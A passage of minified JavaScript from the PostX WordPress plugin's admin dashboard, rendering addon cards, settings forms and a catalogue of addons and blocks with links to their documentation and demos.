dashicons-lock"})))),(0,a.createElement)("div",{className:"ultp-description"},o.desc,o.notice&&(0,a.createElement)("div",{className:"ultp-description-notice"},o.notice)),o.required&&o.required?.name&&(0,a.createElement)("span",{className:"ultp-plugin-required"}," ",__("This addon required this plugin:","ultimate-post"),o.required.name),o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("div",{onClick:()=>{h(!0)},className:"ultp-pro-lock"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)("div",{className:"ultp-docs-action"},o.live&&(0,a.createElement)("a",{href:o.live.replace("live_demo_args",`?utm_source=${e?"db-postx-integration":"db-postx-addons"}&utm_medium=${e?"":t+"-"}demo&utm_campaign=postx-dashboard`),className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.desktop,__("Demo","ultimate-post")),o.docs&&(0,a.createElement)("a",{href:o.docs+(e?"?utm_source=db-postx-integration":"?utm_source=db-postx-addons")+"&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.media_document,__("Docs","ultimate-post")),o.video&&(0,a.createElement)("a",{href:o.video,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.rightAngle,__("Video","ultimate-post")),M[t]&&(0,a.createElement)("div",{className:"ultp-popup-setting",onClick:()=>{m(t)}},i.ZP.setting),n==t&&(0,a.createElement)("div",{className:"ultp-addon-settings"},(0,a.createElement)("div",{className:"ultp-addon-settings-popup"},M[t]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-addon-settings-title"},(0,a.createElement)("div",{className:"ultp_h6"},o.name,": ",__("Settings","ultimate-post"))),(0,a.createElement)("form",{onSubmit:z,action:""},(0,a.createElement)("div",{className:"ultp-addon-settings-body"},"ultp_frontend_submission"===t&&(0,a.createElement)(u.Z,{attr:M[t].attr,settings:g,setSettings:v}),"ultp_frontend_submission"!=t&&(0,l.DC)(M[t].attr,g),(0,a.createElement)("div",{className:"ultp-data-message"})),(0,a.createElement)("div",{className:"ultp-addon-settings-footer"},(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(E?"onloading":"")},__("Save Settings","ultimate-post"),E&&i.ZP.refresh))),(0,a.createElement)("button",{onClick:()=>{m("")},className:"ultp-popup-close"})))))))}))))(!!t.integration):(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}))))))),!e&&(0,a.createElement)("div",{className:"ultp_dash_key_features"},(0,a.createElement)("div",{className:"ultp_h2"},__("Key Features of PostX","ultimate-post")),(0,a.createElement)("div",{className:"ultp_dash_key_features_content"},N?.map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)("div",{className:"ultp_dash_key_features_label"},e.label),(0,a.createElement)("div",{className:"ultp-description"},e.descp)))))))))),e&&(0,a.createElement)(l.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"}))),b.state&&(0,a.createElement)(c.Z,{delay:2e3,toastMessages:b,setToastMessages:x}),y&&(0,a.createElement)(s.Z,{title:__("Postx Intro","ultimate-post"),modalContent:y,setModalContent:k}))}},6731:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(4190),o=n(4766);const{__}=wp.i18n,i=({attr:e,settings:t,setSettings:n})=>{const i=e,l=({multikey:e,value:r,multiValue:i})=>{var l;const[s,p]=(0,a.useState)([...i]),[c,d]=(0,a.useState)(!1),[u,m]=(0,a.useState)(null!==(l=r.options)&&void 0!==l?l:{}),[f,h]=(0,a.useState)(""),g=e=>{e.target.closest(".ultp-ms-container")||d(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",g),()=>document.removeEventListener("mousedown",g))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>t.toLowerCase().includes(f.toLowerCase())||e.toLowerCase().includes(f.toLowerCase()))));m(e)}),500)}),[f]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:s,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>d(!c),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},s.length>0?s?.map(((i,l)=>(0,a.createElement)("span",{key:l,className:"ultp-ms-selected"},r.options[i],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:a=>{a.stopPropagation(),(a=>{const r=s.filter((e=>e!=a));p(r),n({...t,[e]:r})})(i)}},o.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>d(!c),className:"ultp-ms-results-collapse cursor"},o.ZP.collapse_bottom_line)),c&&u&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:f,onChange:e=>h(e.target.value)}),Object.keys(u)?.map(((o,i)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(a=>{let o=[];if(-1==s.indexOf(a)&&"all"!=a&&(o=[...s,a]),"all"===a){const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));o=Object.keys(e)}p(o),n({...t,[e]:o})})(o),key:i,value:o},u[o]))))))};return(0,a.createElement)(a.Fragment,null,Object.keys(i).map(((e,o)=>{const s=i[e];return(0,a.createElement)("span",{key:o},"hidden"==s.type&&(0,a.createElement)("input",{key:e,type:"hidden",name:e,defaultValue:s.value}),"hidden"!=s.type&&(0,a.createElement)(a.Fragment,null,"heading"==s.type&&(0,a.createElement)("h2",{className:"ultp-settings-heading"},s.label)&&(0,a.createElement)(a.Fragment,null,s.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},s.desc)),"heading"!=s.type&&((e,n)=>{let a=!0;return n.hasOwnProperty("depends_on")&&n.depends_on.forEach((e=>{"=="==e.condition&&t[e.key]!=e.value&&(a=!1)})),a})(0,s)&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},s.label&&(0,a.createElement)("strong",null,s.label,s.tooltip&&(0,a.createElement)(r.Z,{placement:"bottom",content:s.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,r,o)=>{const i=t.hasOwnProperty(e)?t[e]:t.default?t.default:"multiselect"==r.type?[]:"",s=e=>{n((t=>"checkbox"===e.target.type?{...t,[e.target.name]:e.target.checked?"yes":"no"}:{...t,[e.target.name]:e.target.value}))};switch(r.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:i,name:e,id:e,onChange:s},Object.keys(r.options).map(((e,t)=>(0,a.createElement)("option",{key:t,value:e},r.options[e])))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(r.options).map(((t,n)=>(0,a.createElement)("div",{key:n,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:t,name:e,value:t,defaultChecked:t==i,onChange:s}),(0,a.createElement)("label",{htmlFor:t},r.options[t])))))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:i,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:i})),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==i||"on"==i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==i||"on"==i}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==i?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const t=Array.isArray(i)?i:[i];return(0,a.createElement)(l,{multikey:e,value:r,multiValue:t});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:i,onChange:s}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:i}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",r.value,"]")}})(e,s)))))})))}},1370:(e,t,n)=>{"use strict";n.d(t,{q:()=>a});const{__}=wp.i18n,a={ultp_wpbakery:{name:"WPBakery",desc:__("It lets you use PostX’s Gutenberg blocks in the WPBakery Builder by using the Saved Template Addon.","ultimate-post"),img:"wpbakery.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/wpbakery-page-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=f99NZ6N9uDQ",position:20,integration:!0},ultp_templates:{name:"Saved Templates",desc:__("Create unlimited templates by converting Gutenberg blocks into shortcodes to use them anywhere.","ultimate-post"),img:"saved-template.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/shortcodes-support/",live:"https://www.wpxpo.com/postx/addons/save-template/live_demo_args",video:"https://www.youtube.com/watch?v=6ydwiIp2Jkg",position:10},ultp_table_of_content:{name:"Table of Contents",desc:__("It enables a highly customizable block to the Gutenberg blocks library to display the Table of Contents.","ultimate-post"),img:"table-of-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/table-of-content/",live:"https://www.wpxpo.com/postx/addons/table-of-content/live_demo_args",video:"https://www.youtube.com/watch?v=xKu_E720MkE",position:25},ultp_oxygen:{name:"Oxygen",desc:__("It lets you use PostX’s Gutenberg blocks in the Oxygen Builder by using the Saved Template Addon.","ultimate-post"),img:"oxygen.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/oxygen-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=iGik4w3ZEuE",position:20,integration:!0},ultp_elementor:{name:"Elementor",desc:__("It lets you use PostX’s Gutenberg blocks in the Elementor Builder by using the Saved Template Addon.","ultimate-post"),img:"elementor-icon.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/elementor-addon/",video:"https://www.youtube.com/watch?v=GJEa2_Tow58",position:20,integration:!0},ultp_dynamic_content:{name:"Dynamic Content",desc:__("Insert dynamic, real-time content like excerpts, dates, author names, etc. in PostX blocks.","ultimate-post"),img:"dynamic-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/postx-features/dynamic-content/",live:"https://www.wpxpo.com/create-custom-fields-in-wordpress/live_demo_args",video:"https://www.youtube.com/watch?v=4oeXkHCRVCA",position:6,notice:"ACF, Meta Box and Pods (PRO)",new:!0},ultp_divi:{name:"Divi",desc:__("It lets you use PostX’s Gutenberg blocks in the Divi Builder by using the Saved Template Addon.","ultimate-post"),img:"divi.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/divi-addon/?utm_source=postx-menu&utm_medium=addons-demo&utm_campaign=postx-dashboard",video:"https://www.youtube.com/watch?v=p9RKTYzqU48",position:20,integration:!0},ultp_custom_font:{name:"Custom Font",desc:__("It allows you to upload custom fonts and use them on any PostX blocks with all typographical options.","ultimate-post"),img:"custom_font.svg",is_pro:!1,live:"https://www.wpxpo.com/wordpress-custom-fonts/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/custom-fonts/",video:"https://www.youtube.com/watch?v=tLqUpj_gL-U",position:7},ultp_bricks_builder:{name:"Bricks Builder",desc:__("It lets you use PostX’s Gutenberg blocks in the Bricks Builder by using the Saved Template Addon.","ultimate-post"),img:"bricks.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/bricks-builder-addon/",video:"https://www.youtube.com/watch?v=t0ae3TL48u0",position:20,integration:!0},ultp_beaver_builder:{name:"Beaver",desc:__("It lets you use PostX’s Gutenberg blocks in the Beaver Builder by using the Saved Template Addon.","ultimate-post"),img:"beaver.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/beaver-builder-addon/",video:"https://www.youtube.com/watch?v=aLfI0RkJO6g",position:20,integration:!0},ultp_frontend_submission:{name:"Front End Post Submission",desc:__("Registered/guest writers can submit posts from frontend. Admins can easily manage, review, and publish posts.","ultimate-post"),img:"frontend_submission.svg",docs:"https://wpxpo.com/docs/postx/add-on/front-end-post-submission/",live:"https://www.wpxpo.com/postx/front-end-post-submission/live_demo_args",video:"https://www.youtube.com/watch?v=KofF7BUwNC0",is_pro:!0,position:6,integration:!1},ultp_category:{name:"Taxonomy Image & Color",desc:__("It allows you to add category or taxonomy-specific featured images and colors to make them attractive.","ultimate-post"),is_pro:!0,docs:"https://wpxpo.com/docs/postx/add-on/category-addon/",live:"https://www.wpxpo.com/postx/taxonomy-image-and-color/live_demo_args",video:"https://www.youtube.com/watch?v=cd75q-lJIwg",img:"category-style.svg",position:15},ultp_progressbar:{name:"Progress Bar",desc:__("Display a visual indicator of the reading progression of blog posts and the scrolling progression of pages.","ultimate-post"),img:"progressbar.svg",docs:"https://wpxpo.com/docs/postx/add-on/progress-bar/",live:"https://www.wpxpo.com/postx/progress-bar/live_demo_args",video:"https://www.youtube.com/watch?v=QErQoDhWi4c",is_pro:!0,position:30},ultp_yoast:{name:"Yoast",desc:__("It allows you to display custom meta descriptions added with the Yoast SEO plugin instead of excerpts.","ultimate-post"),img:"yoast.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Yoast",slug:"wordpress-seo/wp-seo.php"},position:55,integration:!0},ultp_aioseo:{name:"All in One SEO",desc:__("It allows you to display custom meta descriptions added with the All in One SEO plugin instead of excerpts.","ultimate-post"),img:"aioseo.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"All in One SEO",slug:"all-in-one-seo-pack/all_in_one_seo_pack.php"},position:35,integration:!0},ultp_rankmath:{name:"Rank Math",desc:__("It allows you to display custom meta descriptions added with the Rank Math plugin instead of excerpts.","ultimate-post"),img:"rankmath.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Rank Math",slug:"seo-by-rank-math/rank-math.php"},position:40,integration:!0},ultp_seopress:{name:"SEOPress",desc:__("It allows you to display custom meta descriptions added with the SEOPress plugin instead of excerpts.","ultimate-post"),img:"seopress.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"SEOPress",slug:"wp-seopress/seopress.php"},position:45,integration:!0},ultp_squirrly:{name:"Squirrly",desc:__("It allows you to display custom meta descriptions added with the Squirrly plugin instead of excerpts.","ultimate-post"),img:"squirrly.svg",is_pro:!0,live:"https://www.wpxpo.com/postx/seo-meta-support/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/seo-meta/",video:"https://www.youtube.com/watch?v=H8x-hHC0JBM",required:{name:"Squirrly",slug:"squirrly-seo/squirrly.php"},position:50,integration:!0},ultp_builder:{name:"Dynamic Site Builder",desc:__("The Gutenberg-based Builder allows users to create dynamic templates for Home and all Archive pages.","ultimate-post"),img:"builder-icon.svg",docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",live:"https://www.wpxpo.com/postx/gutenberg-site-builder/live_demo_args",video:"https://www.youtube.com/watch?v=0qQmnUqWcIg",is_pro:!1,position:5},ultp_chatgpt:{name:"ChatGPT",desc:__("PostX brings the ChatGPT into the WordPress Dashboard to let you generate content effortlessly.","ultimate-post"),img:"ChatGPT.svg",docs:"https://wpxpo.com/docs/postx/add-on/chatgpt-addon/",live:"https://www.wpxpo.com/postx-chatgpt-wordpress-ai-content-generator/live_demo_args",video:"https://www.youtube.com/watch?v=NE4BPw4OTAA",is_pro:!1,position:6}}},7191:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(1383),o=n(8949),i=n(356);n(563);const{__}=wp.i18n,l={grid:{label:__("Post Grid Blocks","ultimate-post"),attr:{post_grid_1:{label:__("Post Grid #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6829",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-1/",icon:"post-grid-1.svg"},post_grid_2:{label:__("Post Grid #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},post_grid_3:{label:__("Post Grid #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6831",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-3/",icon:"post-grid-3.svg"},post_grid_4:{label:__("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_grid_5:{label:__("Post Grid #5","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6833",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-5/",icon:"post-grid-5.svg"},post_grid_6:{label:__("Post Grid #6","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6834",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-6/",icon:"post-grid-6.svg"},post_grid_7:{label:__("Post Grid #7","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6835",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-7/",icon:"post-grid-7.svg"}}},list:{label:__("Post List Blocks","ultimate-post"),attr:{post_list_1:{label:__("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_list_2:{label:__("Post List #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6837",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-2/",icon:"post-list-2.svg"},post_list_3:{label:__("Post List #3","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6838",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-3/",icon:"post-list-3.svg"},post_list_4:{label:__("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"}}},slider:{label:__("Post Slider Blocks","ultimate-post"),attr:{post_slider_1:{label:__("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_slider_2:{label:__("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"}}},other:{label:__("Others PostX Blocks","ultimate-post"),attr:{menu:{label:__("Menu - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/introducing-postx-mega-menu/",docs:"https://wpxpo.com/docs/postx/postx-menu/",icon:"/menu/menu.svg"},post_module_1:{label:__("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_module_2:{label:__("Post Module #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6827",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-2/",icon:"post-module-2.svg"},heading:{label:__("Heading","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6842",docs:"https://wpxpo.com/docs/postx/all-blocks/heading-blocks/",icon:"heading.svg"},image:{label:__("Image","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6843",docs:"https://wpxpo.com/docs/postx/all-blocks/image-blocks/",icon:"image.svg"},taxonomy:{label:__("Taxonomy","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6841",docs:"https://wpxpo.com/docs/postx/all-blocks/taxonomy-1/",icon:"ultp-taxonomy.svg"},wrapper:{label:__("Wrapper","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6844",docs:"https://wpxpo.com/docs/postx/all-blocks/wrapper/",icon:"wrapper.svg"},news_ticker:{label:__("News Ticker","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6845",docs:"https://wpxpo.com/docs/postx/all-blocks/news-ticker-block/",icon:"news-ticker.svg"},advanced_list:{label:__("List - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7994",docs:"https://wpxpo.com/docs/postx/all-blocks/list-block/",icon:"advanced-list.svg"},button_group:{label:__("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"},row:{label:__("Row","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx-row-column-block/",docs:"https://wpxpo.com/docs/postx/postx-features/row-column/",icon:"row.svg"},advanced_search:{label:__("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},dark_light:{label:__("Dark Light","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},star_ratings:{label:__("Star Rating","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8858",icon:"star-rating.svg"},accordion:{label:__("Accordion","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8851",docs:"https://wpxpo.com/docs/postx/all-blocks/accordion-block/",icon:"accordion.svg"},tabs:{label:__("Tabs","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9045",docs:"https://wpxpo.com/docs/postx/all-blocks/tabs-block/",icon:"tabs.svg"},gallery:{label:__("PostX Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8951",docs:"https://wpxpo.com/docs/postx/all-blocks/postx-gallery-block/",icon:"gallery.svg"},youtube_gallery:{label:__("Youtube Gallery","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid9096",docs:"https://wpxpo.com/docs/postx/all-blocks/youtube-gallery-block/",icon:"youtube-gallery.svg"}}},builder:{label:__("Site Builder Blocks","ultimate-post"),attr:{builder_post_title:{label:__("Post Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_title.svg"},builder_advance_post_meta:{label:__("Advance Post Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_meta.svg"},builder_archive_title:{label:__("Archive Title","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"archive-title.svg"},builder_author_box:{label:__("Post Author Box","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author_box.svg"},builder_post_next_previous:{label:__("Post Next Previous","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/next_previous.svg"},builder_post_author_meta:{label:__("Post Author Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/author.svg"},builder_post_breadcrumb:{label:__("Post Breadcrumb","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/breadcrumb.svg"},builder_post_category:{label:__("Post Category","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/category.svg"},builder_post_comment_count:{label:__("Post Comment Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comment_count.svg"},builder_post_comments:{label:__("Post Comments","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/comments.svg"},builder_post_content:{label:__("Post Content","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/content.svg"},builder_post_date_meta:{label:__("Post Date Meta","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_date.svg"},builder_post_excerpt:{label:__("Post Excerpt","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/excerpt.svg"},builder_post_featured_image:{label:__("Post Featured Image/Video","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/featured_img.svg"},builder_post_reading_time:{label:__("Post Reading Time","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/reading_time.svg"},builder_post_social_share:{label:__("Post Social Share","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/share.svg"},builder_post_tag:{label:__("Post Tag","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/post_tag.svg"},builder_post_view_count:{label:__("Post View Count","ultimate-post"),default:!0,docs:"https://wpxpo.com/docs/postx/dynamic-site-builder/",icon:"builder/view_count.svg"}}}},s=()=>{const[e,t]=(0,a.useState)({}),[n,s]=(0,a.useState)({state:!1,status:""}),[p,c]=(0,a.useState)(!1),d=(0,r.t)();(0,a.useEffect)((()=>{u()}),[]);const u=()=>{c(!0),wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&d.current&&(t(e.settings),c(!1))}))};return(0,a.createElement)("div",{className:"ultp-dashboard-blocks-container"},n.state&&(0,a.createElement)(i.Z,{delay:2e3,toastMessages:n,setToastMessages:s}),Object.keys(l).map(((n,r)=>{const 